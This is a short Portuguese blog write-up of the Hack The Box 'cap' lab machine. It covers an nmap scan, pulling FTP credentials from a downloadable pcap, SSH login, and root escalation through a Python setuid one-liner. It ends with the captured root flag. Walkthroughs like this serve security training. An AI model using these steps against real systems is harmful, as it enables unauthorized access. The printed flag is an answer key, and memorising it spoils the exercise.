Write-up - Hack The Box 'cap' machine

Como hackear a máquina 'cap' do Hack The Box

Posted by 0xdutra on Sunday, October 3, 2021

Minha primeira máquina no Hack The Box foi a “cap”. Está máquina é considerada “easy” e não requer conhecimentos sobre fuzzing, net discovery, etc.

Vamos lá

Com a máquina ligada, vamos começar fazendo um portscan.

nmap -sS -sV 10.10.10.245

Encontramos três portas abertas.

  • 21 vsFTPd 3.0.3
  • 22 OpenSSH
  • 80 gunicorn

Caso queira procurar por vulnerabilidades, execute o comando:

nmap -sS -sV --script=default,vuln 10.10.10.245

Web page

Como podemos ver, existe uma página web rodando. Acesso o dashboard para obtermos mais informações. Ná página “Security snapshot”, temos um arquivo pcap com o tráfego de rede da máquina.

Baixe o primeiro pacote gerado. http://10.10.10.245/data/0

Abra o arquivo com o wireshark, no wireshark temos um tráfego FTP. O FTP com sua configuração padrão é inseguro, podemos vizualizar os usuários e as senhas que trafegaram na máquina.

Privilege escalation

Agora que temos o usuário e a senha, vamos logar via SSH.

ssh nathan@10.10.10.245

Na home do usuário nathan, temos um arquivo “user.txt”, porém, não é nossa flag. Vamos precisar escalar para root.

https://gtfobins.github.io/gtfobins/python/#suid
python -c 'import os; os.setuid(0); os.system("/bin/bash")'

cd /root
cat root.txt

A flag é “44068c38941a543c7588810fe7b00676”

:-)